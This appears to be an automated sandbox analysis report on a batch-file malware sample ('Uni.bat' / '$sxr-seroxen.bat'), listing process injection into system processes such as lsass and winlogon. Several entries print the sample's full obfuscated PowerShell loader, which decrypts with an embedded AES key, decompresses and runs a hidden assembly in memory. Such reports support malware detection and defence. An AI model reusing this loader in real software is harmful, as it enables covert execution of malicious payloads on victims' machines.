Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_78ff17a5ea060c5f\OneApp.IGCC.WinService.exe base: 1F5C6F20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1D9EE7C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21F0A0C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2473AB40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14A0AB70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe base: 29682AC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2E754540000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 24B3FC50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1B4940000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe base: 1AD20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D38B280000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20DCAD40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C7270A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1AB63E30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: BD40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxEM.exe base: 231D83A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22458E80000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A3BEA00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1AC57890000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F6E1C00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 211FA3B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 209E5400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26D44CC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 268A8000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AC74400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26E2E800000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21D83630000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1A12D0F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18B98810000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe base: 690000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28F97E00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20A6C460000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2B3DCC40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22BE8590000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 27E2A410000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9E2850000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21296A00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 225D52E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CCA5EA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 12F47070000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17150A90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22000530000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 254E6340000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 243B3C90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20101B80000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\$sxr-seroxen.bat.exe base: 1B3BCDE0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 21470D50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 28D1E3E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 28D1F030000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2477ED00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2F09E280000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D477F40000 value starts with: 4D5A Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 4748 base: BD40000 value: 4D Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Uni.bat.exe Thread register set: target process: 5568 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Thread register set: target process: 4696 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Thread register set: target process: 3468 Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 65AF3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: F5E03B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6F6E3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: B9033B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 452D3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 8E0A3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: DA943B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe EIP: E8C13B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 242C3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 23B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EA2D3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A6643B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe EIP: 25333B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe EIP: DE2F3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 39603B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 49E03B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CBB43B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 68C23B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D3F43B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7CD43B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F8543B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A9E03B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 98CC3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 79003B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 52C83B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 1CE53B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9E203B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9CF43B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 33943B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\spoolsv.exe EIP: 1DF3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7C143B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DB543B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B5403B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59F03B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3AF43B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0A13B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB803B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E3C03B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C6F23B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE7C3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A0C3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3AB43B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB73B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 82AC3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 54543B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3FC53B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B4943B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1AD23B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B283B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CAD43B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 270A3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63E33B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD43B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D83A3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 58E83B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BEA03B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 57893B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E1C03B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA3B3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5403B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 44CC3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A8003B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 74403B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E803B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 83633B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2D0F3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 98813B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 693B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 97E03B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C463B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DCC43B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8593B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A413B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E2853B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 96A03B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D52E3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A5EA3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 47073B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 50A93B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 533B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E6343B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B3C93B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B83B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BCDE3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 70D53B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1E3E3B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1F033B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7ED03B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9E283B7A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 77F43B7A Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\Uni.bat.exe "uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $dtvqc = [system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\desktop\uni.bat').split([environment]::newline);foreach ($xwedx in $dtvqc) { if ($xwedx.startswith(':: ')) { $iimux = $xwedx.substring(3); break; }; };$srunp = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')($iimux);$lrcpk = new-object system.security.cryptography.aesmanaged;$lrcpk.mode = [system.security.cryptography.ciphermode]::cbc;$lrcpk.padding = [system.security.cryptography.paddingmode]::pkcs7;$lrcpk.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('wjkbu6kw+d26wh+8c8avnw88e4kne0j8v15cyliw9b8=');$lrcpk.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('ncm0bfwz0rht+qrojgon8q==');$sckkz = $lrcpk.createdecryptor();$srunp = $sckkz.transformfinalblock($srunp, 0, $srunp.length);$sckkz.dispose();$lrcpk.dispose();$fpstr = new-object system.io.memorystream(, $srunp);$dsnjo = new-object system.io.memorystream;$viclt = new-object system.io.compression.gzipstream($fpstr, [io.compression.compressionmode]::decompress);$viclt.copyto($dsnjo);$viclt.dispose();$fpstr.dispose();$dsnjo.dispose();$srunp = $dsnjo.toarray();$djuff = [system.reflection.assembly]::('daol'[-1..-4] -join '')($srunp);$dffio = $djuff.entrypoint;$dffio.invoke($null, (, [string[]] ('')))
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\$sxr-seroxen.bat.exe "$sxr-seroxen.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $dtvqc = [system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\windows\$sxr-seroxen.bat').split([environment]::newline);foreach ($xwedx in $dtvqc) { if ($xwedx.startswith(':: ')) { $iimux = $xwedx.substring(3); break; }; };$srunp = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')($iimux);$lrcpk = new-object system.security.cryptography.aesmanaged;$lrcpk.mode = [system.security.cryptography.ciphermode]::cbc;$lrcpk.padding = [system.security.cryptography.paddingmode]::pkcs7;$lrcpk.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('wjkbu6kw+d26wh+8c8avnw88e4kne0j8v15cyliw9b8=');$lrcpk.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('ncm0bfwz0rht+qrojgon8q==');$sckkz = $lrcpk.createdecryptor();$srunp = $sckkz.transformfinalblock($srunp, 0, $srunp.length);$sckkz.dispose();$lrcpk.dispose();$fpstr = new-object system.io.memorystream(, $srunp);$dsnjo = new-object system.io.memorystream;$viclt = new-object system.io.compression.gzipstream($fpstr, [io.compression.compressionmode]::decompress);$viclt.copyto($dsnjo);$viclt.dispose();$fpstr.dispose();$dsnjo.dispose();$srunp = $dsnjo.toarray();$djuff = [system.reflection.assembly]::('daol'[-1..-4] -join '')($srunp);$dffio = $djuff.entrypoint;$dffio.invoke($null, (, [string[]] ('')))
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\Uni.bat.exe "uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $dtvqc = [system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\desktop\uni.bat').split([environment]::newline);foreach ($xwedx in $dtvqc) { if ($xwedx.startswith(':: ')) { $iimux = $xwedx.substring(3); break; }; };$srunp = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')($iimux);$lrcpk = new-object system.security.cryptography.aesmanaged;$lrcpk.mode = [system.security.cryptography.ciphermode]::cbc;$lrcpk.padding = [system.security.cryptography.paddingmode]::pkcs7;$lrcpk.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('wjkbu6kw+d26wh+8c8avnw88e4kne0j8v15cyliw9b8=');$lrcpk.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('ncm0bfwz0rht+qrojgon8q==');$sckkz = $lrcpk.createdecryptor();$srunp = $sckkz.transformfinalblock($srunp, 0, $srunp.length);$sckkz.dispose();$lrcpk.dispose();$fpstr = new-object system.io.memorystream(, $srunp);$dsnjo = new-object system.io.memorystream;$viclt = new-object system.io.compression.gzipstream($fpstr, [io.compression.compressionmode]::decompress);$viclt.copyto($dsnjo);$viclt.dispose();$fpstr.dispose();$dsnjo.dispose();$srunp = $dsnjo.toarray();$djuff = [system.reflection.assembly]::('daol'[-1..-4] -join '')($srunp);$dffio = $djuff.entrypoint;$dffio.invoke($null, (, [string[]] (''))) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\$sxr-seroxen.bat.exe "$sxr-seroxen.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $dtvqc = [system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\windows\$sxr-seroxen.bat').split([environment]::newline);foreach ($xwedx in $dtvqc) { if ($xwedx.startswith(':: ')) { $iimux = $xwedx.substring(3); break; }; };$srunp = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')($iimux);$lrcpk = new-object system.security.cryptography.aesmanaged;$lrcpk.mode = [system.security.cryptography.ciphermode]::cbc;$lrcpk.padding = [system.security.cryptography.paddingmode]::pkcs7;$lrcpk.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('wjkbu6kw+d26wh+8c8avnw88e4kne0j8v15cyliw9b8=');$lrcpk.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('ncm0bfwz0rht+qrojgon8q==');$sckkz = $lrcpk.createdecryptor();$srunp = $sckkz.transformfinalblock($srunp, 0, $srunp.length);$sckkz.dispose();$lrcpk.dispose();$fpstr = new-object system.io.memorystream(, $srunp);$dsnjo = new-object system.io.memorystream;$viclt = new-object system.io.compression.gzipstream($fpstr, [io.compression.compressionmode]::decompress);$viclt.copyto($dsnjo);$viclt.dispose();$fpstr.dispose();$dsnjo.dispose();$srunp = $dsnjo.toarray();$djuff = [system.reflection.assembly]::('daol'[-1..-4] -join '')($srunp);$dffio = $djuff.entrypoint;$dffio.invoke($null, (, [string[]] (''))) Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\Uni.bat.exe "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $dTvqc = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Uni.bat').Split([Environment]::NewLine);foreach ($xWedX in $dTvqc) { if ($xWedX.StartsWith(':: ')) { $IIMux = $xWedX.Substring(3); break; }; };$sruNp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IIMux);$lrCpk = New-Object System.Security.Cryptography.AesManaged;$lrCpk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$lrCpk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$lrCpk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WjKBU6kw+D26wh+8C8AVNw88e4KNe0j8V15CylIW9B8=');$lrCpk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ncm0BfWz0RHt+QRojgON8Q==');$SCKKz = $lrCpk.CreateDecryptor();$sruNp = $SCKKz.TransformFinalBlock($sruNp, 0, $sruNp.Length);$SCKKz.Dispose();$lrCpk.Dispose();$fPStr = New-Object System.IO.MemoryStream(, $sruNp);$DsNJO = New-Object System.IO.MemoryStream;$vIclt = New-Object System.IO.Compression.GZipStream($fPStr, [IO.Compression.CompressionMode]::Decompress);$vIclt.CopyTo($DsNJO);$vIclt.Dispose();$fPStr.Dispose();$DsNJO.Dispose();$sruNp = $DsNJO.ToArray();$DjUff = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($sruNp);$DFfIo = $DjUff.EntryPoint;$DFfIo.Invoke($null, (, [string[]] (''))) Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d6e02c51-9612-4091-b0a3-037f24ee9b79} Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C cd C:\Windows\ & $sxr-seroxen.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\$sxr-seroxen.bat.exe "$sxr-seroxen.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $dTvqc = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Windows\$sxr-seroxen.bat').Split([Environment]::NewLine);foreach ($xWedX in $dTvqc) { if ($xWedX.StartsWith(':: ')) { $IIMux = $xWedX.Substring(3); break; }; };$sruNp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IIMux);$lrCpk = New-Object System.Security.Cryptography.AesManaged;$lrCpk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$lrCpk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$lrCpk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WjKBU6kw+D26wh+8C8AVNw88e4KNe0j8V15CylIW9B8=');$lrCpk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ncm0BfWz0RHt+QRojgON8Q==');$SCKKz = $lrCpk.CreateDecryptor();$sruNp = $SCKKz.TransformFinalBlock($sruNp, 0, $sruNp.Length);$SCKKz.Dispose();$lrCpk.Dispose();$fPStr = New-Object System.IO.MemoryStream(, $sruNp);$DsNJO = New-Object System.IO.MemoryStream;$vIclt = New-Object System.IO.Compression.GZipStream($fPStr, [IO.Compression.CompressionMode]::Decompress);$vIclt.CopyTo($DsNJO);$vIclt.Dispose();$fPStr.Dispose();$DsNJO.Dispose();$sruNp = $DsNJO.ToArray();$DjUff = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($sruNp);$DFfIo = $DjUff.EntryPoint;$DFfIo.Invoke($null, (, [string[]] (''))) Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{13e478b5-f900-4cff-9b71-2eeec68eb126} Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{990e3f84-620e-4699-897b-705569b7aedb} Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140068702 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,ReadFile,WriteFile,Sleep,DisconnectNamedPipe,Sleep, 5_2_0000000140068702
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140068702 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,ReadFile,WriteFile,Sleep,DisconnectNamedPipe,Sleep, 5_2_0000000140068702
Source: winlogon.exe, 0000000D.00000000.3210196959.0000023565F61000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000D.00000000.3193659897.0000023565F61000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000000.3398863683.00000252B7933000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 0000000D.00000000.3210196959.0000023565F61000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000D.00000000.3193659897.0000023565F61000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000000.3522971776.00000252B0EA1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
